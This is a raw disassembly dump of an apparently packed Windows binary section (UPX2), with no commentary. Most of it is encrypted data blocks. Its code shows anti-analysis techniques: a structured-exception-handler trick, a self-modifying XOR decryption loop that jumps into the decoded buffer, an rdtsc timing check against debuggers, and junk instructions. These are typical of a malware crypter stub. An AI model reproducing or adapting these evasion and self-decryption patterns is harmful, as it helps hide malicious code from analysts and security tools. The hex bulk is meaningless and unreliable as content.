dd 0BD3F5842h, 0B0FAD7A4h, 0BFA0017Ch, 806807DBh, 0EB7C98B6h dd 0C633B0F1h, 0BCC233D4h, 6AC49667h, 0AF432709h, 304E5206h dd 0E4967914h, 0B06C88C4h, 0B6AEE6BFh, 7398D2C7h, 85EB282Eh dd 909AF041h, 303C5874h, 0D45FC71h, 406A4770h, 0E85CBDA9h dd 0EDF79882h, 0F03A3823h, 39CB1C27h, 102C4248h, 0B0BC6D79h dd 95BF68B2h, 0C23FF8A5h, 0D59B2C57h, 0E0CA2091h, 608CA8C4h dd 0B2BC5Bh, 0E353C8E4h, 0CE8AB05Ch, 254717FBh, 406A4740h dd 54E3DAA1h, 607C982Ch, 0CF949DCFh, 0CA17B8E2h, 3466C974h dd 40BCD894h, 434422AFh, 0C315CB16h, 0DD579CD6h, 0E0CA0853h dd 60EB254Fh, 566E3862h, 1388F46Fh, 162C3FD1h, 174FE804h dd 405C78F3h, 0D8968324h, 6374D2B5h, 7BFBAFB3h, 0B6A31451h dd 0B5A9BF64h, 0E0BCEECCh, 444C6884h, 0C3C40F16h, 604584D6h dd 0DF1CADBDh, 307A8F2h, 0F72C397Ch, 0A6946D61h, 203C1874h dd 47CE9C04h, 9B4298Ch, 8913F7D8h, 137F945Fh, 0FC7E036Ch dd 246FEE85h, 0A5A1113Bh, 0A08AE044h, 0FA8D50Dh, 642FF822h dd 6163D6FBh, 337B95A6h, 4A8CA8C4h, 36249BC1h, 0F9AABDE4h dd 146A20A6h, 409C6016h, 0BF86D87Ch, 9A6752DBh, 70369BB8h dd 0C8A9ADB3h, 809CB8E2h, 51A15864h, 29AFADF1h, 6738809h dd 0A759FB14h, 0D36CBEB4h, 0E0FC7F93h, 33A7A8C4h, 529BB17Ch dd 67ACC8E4h, 160038F1h, 0B0CCE904h, 875B0C94h, 704C0067h dd 0E58B3814h, 0F03A10E1h, 9CB8D4h, 0F87E4F10h, 5F432F8Eh dd 0D0C1E3DEh, 23DCCE2Bh, 782701A1h, 6D7715DFh, 70BA9718h dd 3F73AB7h, 6784836Fh, 1604FDF1h, 0B0CCEB04h, 0CB480C94h dd 0E6D3ECA1h, 0B0F19BB4h, 0F30C1E7Bh, 0B6A37451h, 9B244964h dd 2537C8BEh, 307A5718h, 0B3D4B22Dh, 582601A7h, 63EC5A35h dd 0FB8CF0A7h, 36239CD1h, 0B81CA0E4h, 623D5874h, 0F3CDB10Ch dd 0E3C9F2C4h, 27EC3E1Ch, 56443D31h, 0F00C2844h, 839ACCC4h dd 263C2FE9h, 57BC6EF4h, 674CD01h, 0C2DCF814h, 0AE78FDA4h dd 4579EFF2h, 708C9EFCh, 751C3C54h, 341942E2h, 0D73C6E4Ch dd 86F44D81h, 401C7894h, 5AE77D24h, 0CABE9AB3h, 7EEFE46h dd 8716B13Fh, 12868A56h, 934B3A22h, 12C70C56h, 98DE7770h dd 6F103527h, 0EFFC1802h, 8F767640h, 98A9C7ABh, 6FACFEDBh dd 16078AE1h, 24791704h, 0BF5C4EABh, 0E6D74EB1h, 0E0F115B4h dd 7D0C1E7Bh, 0B6A33041h, 7A7E1964h, 0DC0927F4h, 0CF4C5EBBh dd 0F6E73E81h, 2CD977A4h, 1FFC2E0Bh, 46B7EE51h, 68A9B554h dd 6FACFEDAh, 160320C1h, 2533BE04h, 406A4356h, 0EF90ADA7h dd 0A37C9882h, 0F00C28ACh, 81F6E5D4h, 279CA5E5h, 50E4D8C2h dd 44C9A98Bh, 45DCCE01h, 98EF4B64h, 21F3E8CBh, 4699DC41h dd 1021FB54h, 0E5ACE2E4h, 5CBD3E68h, 0C1A0E420h, 0A83C6BE1h dd 2F13F7E0h, 0B4949DC1h, 18F3D7BEh, 7F634706h, 3DD36605h dd 0B2888E8Ch, 304C4D3Ch, 65349814h, 2593775Bh, 0C4B8930Dh dd 183925F4h, 8B1C0E6Ah, 11CAC0B4h, 533E5E4Eh, 0B0A4BE21h dd 0CB5C8794h, 82EC62E0h, 72E967E4h, 730C1E78h, 0BE1DB010h dd 4C137738h, 663FDB81h, 0CACD8080h, 0BF3407EBh, 3193775Bh dd 0E088A0F7h, 0C167A8C4h, 1C17ECh, 90B120E4h, 0FE5874h dd 0B0FC5004h, 50B47894h, 12EC0824h, 0E5C49890h, 180C2845h dd 809CB8D7h, 9D2C64A6h, 6DB0FCA0h, 30B4EBAAh, 28BCE168h dd 506C88A4h, 0D0D84CBFh, 0F1962399h, 3624BFB9h, 711620E4h dd 0E25DA78Bh, 0B1CEE800h, 47597B92h, 0E1D38A1Ch, 15FFE88Dh dd 3143808Ch, 90h, 1CDh dup(0) dd 816FD700h, 46497D7Ch, 45200031h, 31h, 13CEh dup(0) ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame public start start proc near push ebp mov ebp, esp call sub_31462017 call sub_314620C0 mov ebp, 12FFC0h ; DATA XREF: sub_31462017+Cw ; sub_3146C8C7+Cw jmp loc_31462070 start endp ; =============== S U B R O U T I N E ======================================= sub_31462017 proc near ; CODE XREF: start+3p push dword ptr fs:0 mov fs:0, esp xor dword ptr ds:loc_3146200D+1, ebp xor ecx, ecx push ecx push 1000h push 8 push 80h push ecx push ecx push ecx push 80000000h push 80000000h push ecx push ecx call ds:dword_3143808C ; LoadLibraryA xor edx, edx push edx push edx push 80000000h push 80000000h push edx push 2000h push edx push 80000000h call ds:dword_3143808C ; LoadLibraryA loc_31462070: ; CODE XREF: start+12j sub eax, eax loc_31462072: ; CODE XREF: sub_31462017+61j dec al or al, al jz short loc_3146207C jnz short loc_31462072 jmp short near ptr loc_314620DC+7 ; --------------------------------------------------------------------------- loc_3146207C: ; CODE XREF: sub_31462017+5Fj call $+5 pop ecx sub ecx, 0FFFFFFB4h push ecx mov edx, 28B0h stc mov ebx, 7Dh loc_31462094: ; CODE XREF: sub_31462017+97j xchg al, [ecx] cld cld cld xor ax, bx xchg al, [ecx] cld cld cld add ecx, 1 add bx, 7Fh sub edx, 1 or edx, edx jnz short loc_31462094 pop ecx mov ebx, [ebp-8] mov fs:0, ebx leave jmp ecx sub_31462017 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= sub_314620C0 proc near ; CODE XREF: start+8p arg_C = dword ptr 10h mov ecx, [esp+arg_C] xor eax, eax pop dword ptr [ecx+0B8h] retn sub_314620C0 endp ; sp-analysis failed ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx loc_314620DC: ; CODE XREF: sub_31462017+63j test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_31462118 pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3146210F add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_31462117 ; --------------------------------------------------------------------------- loc_3146210F: ; CODE XREF: UPX2:31462100j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_31462117: ; CODE XREF: UPX2:3146210Dj pop ebx loc_31462118: ; CODE XREF: UPX2:314620EAj push ebp mov ebp, eax sub dword ptr [esp+4], 100D2h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0 rep movsb call sub_3146218D mov ecx, eax call sub_3146218D sub eax, ecx jz short loc_31462161 cmp eax, 100h ja short loc_31462161 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_31462191 jmp short loc_314621A0 ; --------------------------------------------------------------------------- loc_31462161: ; CODE XREF: UPX2:31462148j ; UPX2:3146214Fj test dword ptr [ebp+3638A5h], 80000000h jz short loc_3146218B lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3146218B: ; CODE XREF: UPX2:3146216Bj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3146218D proc near ; CODE XREF: UPX2:3146213Ap ; UPX2:31462141p rdtsc retn sub_3146218D endp ; --------------------------------------------------------------------------- db 86h ; =============== S U B R O U T I N E ======================================= sub_31462191 proc near ; CODE XREF: UPX2:3146215Ap mov dh, dl mov ecx, 27D2h loc_31462198: ; CODE XREF: sub_31462191+Cj xor [eax], dl inc eax add dl, dh loop loc_31462198 retn sub_31462191 endp ; --------------------------------------------------------------------------- loc_314621A0: ; CODE XREF: UPX2:3146215Fj pop es out dx, eax xchg eax, edx call near ptr 7C71FD09h clc push 20BD21AAh shl cl, cl or eax, 0FE78F36Ch icebp in eax, 1Bh aad 9Fh popa xchg eax, esp dec eax xor eax, 0B9039002h mov esi, 699C0E53h and edi, ebp mov fs, word ptr [edx-66F33B7Dh] sal edi, cl xor dword ptr [ecx-4D3A2705h], 970CA252h popa outsd or al, 0FFh out dx, eax db 65h int 76h ; IRQ14 - AT/XT286/PS50+ - FIXED DISK in al, dx sbb eax, [esi-40h] jmp near ptr 0F5B1A157h ; --------------------------------------------------------------------------- dd 0C4285F6Ah, 0F781EF3Fh, 9BC400C9h, 0D3A100ECh, 433D0025h dd 58DEA435h, 1CA964DEh, 0C0670F99h, 0CC7EFA6Fh, 4761AC43h dd 96CF4DE8h, 62EA6Dh, 7AF463h, 79F77EC5h, 46EF41EAh, 9B652D3h dd 0B62507CEh, 43B8E96Fh, 9DE284C8h, 0EF229C16h, 0A176C04Bh dd 0AA17B835h, 0F0188B2Ch, 81540325h, 16A15A0Bh, 3B71C4A6h dd 904F44BEh, 97E1D8D9h, 7FAA8B11h, 0AE29C293h, 0BFEA211Eh dd 0C8413DB3h, 0CCE7544Eh, 0F972DA73h, 0A575100Bh, 2894237Eh dd 5596B950h, 0DD5D4CF0h, 70DC715Ah, 2D817B1Dh, 0A02C818Ah dd 0CC972F26h, 0D04AF22Bh, 0FD1A79D5h, 837AF458h, 2E877023h dd 0F6FD249Eh, 7ED0ED33h, 0D55355CEh, 78C457B4h, 85FA3173h dd 61119C20h, 0FB6409A3h, 0F8E3CC70h, 0F06968B6h, 9D7DA376h dd 20AC2F10h, 37ADC467h, 50CA903Ah, 7CA5D7D6h, 43F93484h dd 98028C6Eh, 0E6AF2D16h, 0A0428A0Dh, 0E05AA447h, 6D8DEC0Ch dd 10BC3FA8h, 0ACADDC13h, 40BA3640h, 5867C151h, 0FBEA52CEh dd 8401C519h, 4D9B940Eh, 0B804BC26h, 0C21B51B3h, 4D91DC60h dd 0ECF91691h, 726E87A6h, 696A1796h, 53FBA93Bh, 0CB2954F8h dd 2F7B906Dh, 8C4D7AEEh, 0A821F441h, 55C5B42Fh, 0D864F710h dd 754A20DDh, 9706F3B6h, 0B79A148Ch, 39D82CCCh, 50CE44D6h dd 68E23456h, 150574EFh, 9824B750h, 3425649Bh, 0C842BEB4h dd 880AD424h, 0F876EC66h, 0F84B0414h, 29C84B9Ah, 40BB5CFEh dd 0CD2D4CC7h, 70DC5F88h, 8902769Eh, 0F68F6B0Eh, 50329A1Dh dd 0D04AC43Bh, 0E8608DBFh, 597A9E6Eh, 12F80665h, 0B60B161h dd 0B9293C80h, 1667D70Dh, 78F25ADDh, 923E00F1h, 0AECA9C16h dd 8E3AB42Eh, 941E8812h, 62FF1B5Eh, 8582CA4Dh, 168DDE3Bh dd 0B57B1FA6h, 66F19A03h, 0FBECEDD6h, 80F80006h, 8AAF0F06h dd 0B02A9222h, 0CA423839h, 65D1D44Eh, 0F844D784h, 9F8B7481h dd 1E95E013h, 0BA3FBFAEh, 0A7D27AFDh, 0F56565AEh, 883444BFh dd 9BFC1185h, 0C8CDAC10h, 80CF4B3Fh, 6362EA6Eh, 36411EE3h dd 0E788EF86h, 0B52525EFh, 48F404EBh, 5B28D945h, 71116CD0h dd 1F0BF501h, 9E1AF693h, 0C1825C2Eh, 65DFCC46h, 0F05CD836h dd 8E833FDh, 5065CD78h, 3B53AFA2h, 0A9C904D4h, 2E23681h dd 574FF9F6h, 2112BA13h, 0B02AA407h, 360FB8BBh, 86A52BB1h dd 0B57661CDh, 108A047Eh, 6F2FB7F0h, 0A4889FAAh, 63C6D94Bh dd 164664E8h, 23647E7Fh, 4218568Dh, 0D2E627D3h, 0A043AC3Eh dd 24E9DC56h, 0C4F1F404h, 18FA0CECh, 5AA2249Eh, 22906DF6h dd 0F52504C0h, 78C45708h, 0D0CE07A6h, 0A852957Eh, 0AAEE3F2Eh dd 0B29E4746h, 9A6A8E1Eh, 8E8AE74h, 20EA1DE6h, 69B246A6h dd 0AF9ABBD4h, 5ED9AA43h, 5A32BEEh, 9F9683F9h, 3D2AA41Fh dd 0FE52BC83h, 0EC596D4Eh, 17F9EC66h, 0FD0BA18Dh, 28940C96h dd 548DB123h, 0B82D4CF0h, 5080308Eh, 1DFD839Ch, 0A02CAFF0h dd 0CD6D6CA3h, 0D1042C0Ah, 0F98ADC56h, 537AF46Eh, 7AF748E3h dd 42FA43EBh, 24AB4ADFh, 60BF33ABh, 7DBD84B1h, 25F584FEh dd 0A814A37Ah, 0FBB821D1h, 2705CC70h, 0C651A2CBh, 62829676h dd 560FEB8Ch, 81B21A9Dh, 50CA4596h, 0E1037741h, 0D7AE50E2h dd 0A3A819F9h, 4619A428h, 0F41419B5h, 0B45AD478h, 46E71331h dd 958A3245h, 6EC46856h, 32BECA2Dh, 7CA6B328h, 1AEA0ED6h dd 3E9783DCh, 251AA235h, 2BEED8E6h, 0D04F43D6h, 79ABEF56h dd 8543CE8Dh, 18A430D0h, 4C2B16EBh, 3BA11892h, 48AE27BCh dd 766FAD67h, 0C45A84FEh, 0F873CA46h, 55C5E77Eh, 0D864F728h dd 843324DBh, 2CF60379h, 761F9B86h, 0D0B21A9Ah, 0AF35B97Bh dd 2E77A385h, 6BFA42D5h, 0B0D60D88h, 0E72AA41Fh, 0F30429C9h dd 75A5D478h, 0F844D720h, 0EF716C97h, 42F81C69h, 2ABA5EAEh dd 30D226C6h, 70EE64DFh, 8868B87Dh, 2B16FE5Eh, 0EED053E2h dd 0D07E9B46h, 0ABEF56h, 0FF850BB4h, 0DD4990Bh, 61F824A8h dd 0DD3D6CE7h, 60EC6F84h, 0BBD2A865h, 0C852DC6Eh, 0A8129516h dd 0C034DC2Eh, 0D852CD46h, 0F06AE45Eh, 882FC76h, 20B2B18Eh dd 38B22CA6h, 39C15BEh, 53B0C929h, 0D95174D8h, 0EDD208AAh dd 73C446E5h, 0D13329BBh, 1F08D478h, 0CE4946F3h, 7C0F8D7Eh dd 0C0A22AA9h, 40BA34B8h, 33BD238Ah, 2BA14ABh, 0E46B0A9Fh dd 0F67FF36Bh, 0DD47C047h, 2F1AC47Fh, 0DE598EC3h, 70FF7D6Eh dd 0DB923AB9h, 43CB66C2h, 25A372D3h, 29530ABh, 0C91098Ch dd 0E45CD88Dh, 0DC41F945h, 0B449D82Eh, 0B637A034h, 9518A75Eh dd 4EE78817h, 61FF78E7h, 5DC06FA6h, 16AF30DFh, 258730BFh dd 0E98A048Fh, 9853EB68h, 0D14FD65Dh, 0BA12D942h, 933FB721h dd 0BB72AD15h, 64EB610Ch, 45C74EF3h, 14DF40C1h, 39B73EAEh dd 2A964BAh, 0ED761D93h, 0C568FC5Ah, 0FB32C847h, 0A42BA14Ch dd 870D8833h, 6C1F9C02h, 4BA03FF6h, 43DA45F0h, 48B653DEh dd 14B32C8Bh, 1D8004B2h, 0D60AE09Fh, 0FC47F07Fh, 945FD947h dd 0AB2B9F29h, 0A407812Ah, 8E7911Fh, 45FF66C8h, 4AD045EAh dd 50B336DFh, 2E963991h, 0C19F1887h, 0F160F872h, 0D55ED17Ch dd 8F42FD45h, 891CA02Bh, 9121890Ah, 578A6104h, 41E468F3h dd 29EE51C2h, 1FD229ABh, 1FA710BBh, 0ED6E0992h, 0C474F546h dd 0B873C94Ah, 843EA179h, 0AE12B133h, 4E1F9807h, 59F761E7h dd 44CF639Eh, 38AF59E2h, 8AE359Eh, 1DB56CA7h, 0E26FD28Ah dd 0C64DF565h, 0B45FF32Eh, 0AB20A910h, 0B5048B37h, 4F82BD0Eh dd 4FCC60EBh, 5DDF59CAh, 3FAC2AF7h, 1C8331A4h, 0C1941B87h dd 0F97DC006h, 0D243E87Ah, 0B130DD44h, 8117D40Fh, 9D1BBA16h dd 56EC4B09h, 28C770FFh, 2EDF44E1h, 3DBE2580h, 9A0593h dd 0C965129Fh, 0C56ADB0Eh, 0D740FC48h, 0A339A15Dh, 87108C56h dd 7309910Dh, 71D43EB5h, 30DE57ECh, 2BAD4EE6h, 53A927ABh dd 9722D4h, 0F559848Ah, 0C44BDA62h, 0B44EF54Bh, 0AD30A534h dd 0B119812Ah, 7CE7AF76h, 45F67DC8h, 5DDF45F2h, 35A617BEh dd 3BE22CB3h, 0E58E0797h, 0F57BD86Bh, 0F645F07Bh, 9C27D05Fh dd 0E03FB927h, 991F8233h, 75E3520Eh, 6EC453E1h, 40DF58C7h dd 2CA02590h, 318605ABh, 0EB6D109Ah, 0C968C30Eh, 0D174C952h dd 9E4AA152h, 82069D22h, 500E871Bh, 71E465F4h, 55CD41F2h dd 23AD68C5h, 2EDA3AABh, 1D802F92h, 0D66FF09Fh, 0A847F07Fh dd 0B279C060h, 0BD26AD23h, 9305960Eh, 8F18F13h, 52D960C0h dd 5DC64DC3h, 33A536EEh, 2D912FB3h, 0F4B47496h, 0F977FE45h dd 0D579C16Ah, 0A72BC855h, 9414D420h, 99179E25h, 63DF610Ah dd 5AF26EF3h, 33DF57C1h, 2C9C4CB5h, 269A0593h, 0C775199Fh dd 0C37FC768h, 0D65DC552h, 9F3E8A3Eh, 0AE0CB926h, 1F9807h dd 68DD78C8h, 42FA4AFBh, 3BA75FD9h, 0BB500BDh, 36F20283h dd 0F57ACB8Ah, 0CB47CF78h, 0AE55DD5Ah, 88268246h, 951E8B2Ch dd 61D48815h, 41EF60FCh, 55D761CAh, 50B336D1h, 1DB32898h dd 0C983068Bh, 0EA7DEA68h, 0D95EC573h, 0A716D259h, 0E034B125h dd 8A259828h, 46EF7017h, 5DD66EFFh, 25F758CFh, 21A023ABh dd 1C9E36DEh, 0EB6B12A3h, 0F37FF061h, 0D65BDE52h, 91259059h dd 0BB0BAF38h, 6E13861Ah, 4BC50CE1h, 51DE77DFh, 38B748C4h dd 0FB637CEh, 17810995h, 0E46FEF9Dh, 0C64DFF16h, 0B459D140h dd 0AC37AB46h, 84198B36h, 69EC8514h, 529A71E3h, 38C44FC3h dd 34A421CDh, 0B8D2FD6h, 808E1185h, 0FD66E24Fh, 0C44FCA6Ch dd 0BB2DD075h dd 8E3B9C2Bh, 0F8178002h, 75FE6A37h, 5CC772E4h, 3CE51E9h dd 3DBC22A9h, 148F10BDh, 0FC6308A5h, 0CE53946Bh, 0D640C952h dd 0A005B05Bh, 0E823B233h, 650E9A27h, 6CF762F4h, 5ECF54D1h dd 9AE4EE3h, 14B41DCEh, 1D9C1E83h, 0F16FD68Ah, 0C44BDA72h dd 847BB44Bh, 91028D10h, 0B444D66Dh, 5A82B03Ah, 4CD973EBh dd 73D75FC9h, 2CA3DDBh, 18AD3BB3h, 0E5B11A8Bh, 0D96AC97Fh dd 0D74FF61Eh, 0BA27C967h, 8C3B8237h, 80378913h, 75D8043Fh dd 5CC74FF1h, 35D655F8h, 19AA09A3h, 86D932DEh, 0DE547E9Ch dd 0A1704085h, 0A0405374h, 0A0DF3B68h, 6362EA69h, 562CA2AAh dd 686D5AD6h, 0EE3FDB86h, 0CBC20A8Dh, 0A284440Ah, 317F6CEEh dd 0C1C2AF05h, 0A8229C7Eh, 0E47639C6h, 0B252A645h, 0A33AB55Bh dd 0C409F91Ch, 704E9FDEh, 69F246F2h, 0C53517ECh, 68D460D0h dd 7FF6B06Dh, 0AE2E8293h, 0B8EE271Eh, 0DCD731F5h, 0D35AE275h dd 0AA7286AFh, 228A3416h, 79669796h, 10FA5EFFh, 0DBCA2697h dd 1ABE6C1Eh, 1DFD2CF8h, 0A02CA80Ch, 8B1268A5h, 0DF8A41ECh dd 32951ECFh, 0C3B8D736h, 0F06D3FD1h, 0CF55DB5Fh, 4867B8B9h dd 88A54CEh, 78F21CEFh, 90605075h, 0E848509Dh, 0D03AB446h dd 8A50A646h, 0F902E434h, 6282FC06h, 70C9458Eh, 344B959h dd 9954488h, 53A4C929h, 7F7F74D8h, 1599FD72h, 0B01CB162h dd 5DCFB0D5h, 0E06CC44Eh, 0AB253D65h, 9501D681h, 28942774h dd 6741BB23h, 733A4CC6h, 0FB159B21h, 0BE398673h, 0E895190Eh dd 5032AC0Eh, 2FB53B24h, 0D38459DDh, 8FF7F458h, 189224C9h dd 0CF552D76h, 0A247B749h, 0E5DA62F5h, 0F5D21826h, 9022D871h dd 56D67416h, 45B14BD1h, 0D864F7B4h, 0FB1E24DBh, 20EB73FBh dd 0FF72148Eh, 0B34DD358h, 5091B79h, 68E25C3Eh, 6D7B29EEh dd 98249716h, 35A76D2Dh, 0C874A2ABh, 0B10B801Fh, 723BD36h dd 26B176EBh, 0CA69B96h, 7BFCA151h, 9A8F4CF0h, 98BF64DAh dd 88027CF6h, 9FF71553h, 0D2329A3Dh, 0DADF49C1h, 0B862EA4Dh dd 245A393Ch, 9B922686h, 0F7CC285Ah, 7ED96C33h, 0A7FA99CEh dd 4EE93E63h, 0BA0AA0FEh, 0C2E1C116h, 0C9D2EC34h, 5552CC46h dd 0EC0851Ch, 0CB7289BFh, 1CFA81E7h, 0BCB72C90h, 0D9884CB6h dd 5EDE3C43h, 431883EEh, 98126453h, 3177A41Eh, 0FE5925DBh dd 84C75F4Eh, 7B72DA5Ah, 10822002h, 281B9899h, 0AC3B34AEh dd 58D24ECEh, 71EE0C8Ah, 1DFD7CF6h, 0A02CAF94h, 3CBF50ADh dd 0D04BC01Ah, 0E8088C56h, 7AF086h, 4AC05A86h, 0A555739Eh dd 48F40720h, 0F7579DFDh, 78F26DE2h, 9260D5AFh, 0C023F647h dd 803AB42Eh, 0BAC73314h, 666AD265h, 53F60AF3h, 24F240DEh dd 6FB22CA7h, 70EEF041h, 97E25CD4h, 0B6C6367Bh, 5897D506h dd 0A4C9B26Ah, 0A2963766h, 0B70B864Eh, 22E71330h, 498A3245h dd 0F8D7DC13h, 62FCBF8h, 0D5D27AFDh, 27B82089h, 55A389Ch dd 0A01B9099h, 78010726h, 2313D454h, 0B8328CFDh, 502AA43Eh dd 7207F3D4h, 0B1AA12A5h, 48C03472h, 44AEABCEh, 4A6793EEh dd 0C30AB2C2h, 941009E9h, 267B418h, 0E6D2CC42h, 0B66B9154h dd 1DFA71FDh, 397914B8h, 28B2B92Bh, 81C94488h, 0EC30A380h dd 9F727B2Eh, 97128C07h, 0B02BB49Ah, 0F27C3C36h, 601CC43Bh dd 7C7DEC58h, 108A057Fh, 5D822216h, 7E3B725Fh, 1F9C0596h dd 0BF6126ABh, 0C7033A30h, 0CA4B5A25h, 0EB64FD26h, 0EC6051C1h dd 0D33BDC60h, 0DFFFFBAFh, 95920C86h, 6B4B51Bh, 20C256B6h dd 60DA54C2h, 0ED0D3FB6h, 903CB8D4h, 0A822902Bh, 7FBFBB2Eh dd 3152CC46h, 0F06AE4EFh, 5AD2C2F7h, 0A59542C7h, 38B22C03h dd 0FCC2823Dh, 0ECED51EAh, 80FA7477h, 6B67AC3Ah, 0BF1098B2h dd 0C84230B3h, 0C057794Eh, 0C552CC46h, 64EF635Fh, 140E63E3h dd 0C1C6418Eh, 30F2B3B8h, 19F10AAh, 0F8010277h, 0D535BB34h dd 47756A4Eh, 6A7BCB3Eh, 0E862FB46h, 0FF281699h, 2EA9C613h dd 606A179Eh, 0A0926CE6h, 60DA54C7h, 168503A2h, 0F46BEB92h dd 92B76316h, 453A8212h, 0EB64B886h, 94EF6D97h, 5982CA4Ah dd 209814E6h, 6EE37D26h, 6E5FBBEEh, 0E5E26AEAh, 0B6E1E77Bh dd 5121DC06h, 0E27AF54Ah, 5DBDED67h, 0E06CEF3Ch, 756E8E1h dd 26B142EBh, 0A861E496h, 76AF5F23h, 9B2B4DC6h, 718065B4h dd 0FBFD4F09h, 200F6B0Ah, 8E72A49Bh, 8E3EC53Eh, 0B2161CD3h dd 0D0F12F5Dh, 48910735h, 871FA9A2h, 0C3C20AABh, 60DB5874h dd 7078E7E6h, 930A84FFh, 0C8E9B7EEh, 66C97FA5h, 9F57B827h dd 0DE8111BCh, 5B8D3BF5h, 0ABCDD805h, 52E67C72h, 3A9815FEh dd 6E77A329h, 0BFA42D2h, 0AE29F68Bh, 0BCEE271Eh, 21C1731Dh dd 8A5D1349h, 71720466h, 43490731h, 7FF65AD9h, 1CFF66EFh dd 2AB1258Bh, 168517B1h, 0E1552082h, 0D775F060h, 0CD71F055h dd 0BE2FB64Ch, 9A078A22h, 6E159D1Dh, 68EA49DAh, 55D84BF2h dd 29963CC4h, 14BF33BCh, 0C8103AEh, 900A86FEh, 0A8229C46h dd 0A348DD2Eh, 0B128E222h, 8044823Bh, 41CCFC1Ah, 43BA5FCDh dd 4CDD54C5h, 5AAB20C8h, 3AA70F83h, 0CFB003CEh, 0BE32C24Fh dd 0C458CD68h, 2017B643h, 0E05AD44Eh, 5B9F6D3Bh, 0D68A3260h dd 1EB77713h, 0D54534AEh, 58E47758h, 4F58C1Fh, 31C16CAh dd 9621C2BBh, 849EF526h, 0B660B110h, 0F59DE2D7h, 0BDF7D71Bh dd 18A430DCh, 67A85215h, 0C5675A13h, 56ED854Bh, 8F77E3E6h dd 6A0AB2C9h, 24D8DA9Fh, 71C14A60h, 339D2E47h, 0B750C3Fh dd 74010389h, 559E1CAAh, 3037EAF3h, 50CA72FEh, 68E2543Eh dd 0C3BC27EEh, 0D45EC828h, 1ABF5B1Eh, 0C3428A0Dh, 734DA08Eh dd 721EE0Ch, 26B156EBh, 5C629996h, 483FCAA6h, 0A7D27A86h dd 0F402F70Eh, 60FD8308h, 0A01A9405h, 0E771EA75h, 94649771h dd 1762901Ah, 36415EFBh, 0E6FBE486h, 0DE42DB61h, 0B73DC343h dd 56C88543h, 0F53B5FE6h, 0A64A807Bh, 0F973CD16h, 916BE47Fh dd 7EC73317h, 186AD265h, 882FC7Dh, 72DF47DBh, 7C9C1E95h dd 0AFCA08F2h, 5ED9F643h, 80F09CEEh, 0EB658C06h, 0DE43D66Eh dd 0C803DA42h, 0B2CF2B1Eh, 7172DA5Dh, 26B15EFBh, 0A5931396h dd 76A34523h, 3857C5C6h, 21EA52E2h, 0B3A8E909h, 0C8899438h dd 0B832AC22h, 0C93471B3h, 653BDC60h, 3646B2D3h, 0ED3DE486h dd 0F7CCDB61h, 7EDC5633h, 0E38A54CEh, 4EEC0043h, 58784FEh dd 0A814823Ch, 0C150E07Eh, 0B000CC2Ch, 706AE45Ch, 34C86989h dd 0E01F14B8h, 0B59059FCh, 66D41933h, 6E880ED6h, 9E90C163h dd 0CE468C30h, 0E27BF44Eh, 0F40C29C9h, 1F02D478h, 0CE4EAAF3h dd 770FC27Eh, 28A22AA8h, 40BA3846h, 17811BC6h, 42D92F9Dh dd 0C44E38D8h, 0A8F6B0Eh, 2B329A1Dh, 0D04AC356h, 3DD75156h dd 597AC276h, 2484B10Bh, 1A4224A8h, 0A03DC343h, 60DA54C2h dd 31BC25B1h, 0BE5EC1B0h, 0A86ED052h, 0FB9021D1h, 18D7CC70h dd 0F25F6051h, 6011FC76h, 209A148Bh, 21A1992Bh, 0DD934488h dd 5EDE6E6Bh, 74099CEEh, 259173F9h, 0B01C9828h, 0D8C6B336h dd 615AD44Ch, 0F8737C8Ah, 11E2507Eh, 0D7A21C97h, 7686223Bh dd 0C816CDC6h, 20EA64DFh, 8868A87Dh, 968F6B5Ch, 3D329A1Ah dd 0DD3F9DFEh, 0E871543Eh, 0CAEF0B6Eh, 0F3923ABDh, 5C17A77Ch dd 48C20AA8h, 0E5577DBBh, 78C47296h, 0B29F7BAEh, 2D22AA2Ah dd 49BEBBEEh, 5352CC47h, 0F0E1E81Eh, 8D0DCC89h, 20AC0AE2h dd 6D5A960h, 3ACB4488h, 2E336D6h, 0AE6F8BECh, 1B12BA3Ah dd 34255BE6h, 0C842BD56h dd 88CF59DDh, 9272DA78h, 0EFD9566Eh, 1E9E0203h, 4F7AB1AEh dd 58D30C43h, 0F257E9DEh, 39024AE8h, 5A337C06h, 2C5A53D9h dd 8E4AC43Eh, 0DCEB3A7Dh, 9585A04Ah, 18A43724h, 2E3A9913h dd 49733C80h, 9F205E26h, 567E119h, 0FA0AB2E0h, 0A836F416h dd 9368B42Eh, 0E47859B9h, 0B4E7E468h, 9D0FE852h, 20AC548Ah dd 320423F6h, 44EE0035h, 6AEABC17h, 0CAE875A4h, 9B589E04h dd 0B80EE015h, 94D5DB6h, 0EB0BDCAEh, 762C822h, 0AD07544Ch dd 289420FEh, 40BA2846h, 6EFC69C6h, 50C444A6h, 0AD385CD8h dd 9834B12Bh, 984A895Eh, 9A40B71Bh, 0C82C9519h, 9585A36Eh dd 18A437DCh, 3006E01Fh, 48A83CB6h, 9F89039Eh, 4ECE4673h dd 14870FFEh, 0C222AA03h, 0AB21572Eh, 3003C18Fh, 0F06AE45Bh dd 2E6D950h, 0B565438Eh, 388417FCh, 0C6803Dh, 6F8A573Dh dd 0DFA74EEh, 0AE0C1ABBh, 4F79F31Eh, 0FE7E96A3h, 9E9A514Eh dd 90C76132h, 938A3242h, 1EB79833h, 0CD3734AEh, 58E472A1h dd 7080AAF5h, 77512AA7h, 9626B29Bh, 0B8CA2F26h, 5BDBEB40h dd 80D751A8h, 0B07AC252h, 6D3CFE8Bh, 2742448Eh, 293DC34Ch dd 693943BCh, 93F31B6Bh, 0BBC50F14h, 0C09F11D8h, 333A8212h dd 33A54BE2h, 6595B7E7h, 8B4C06Ch, 35F1A90Eh, 4CB32C90h dd 25FA2C94h, 0FD1D5CD6h, 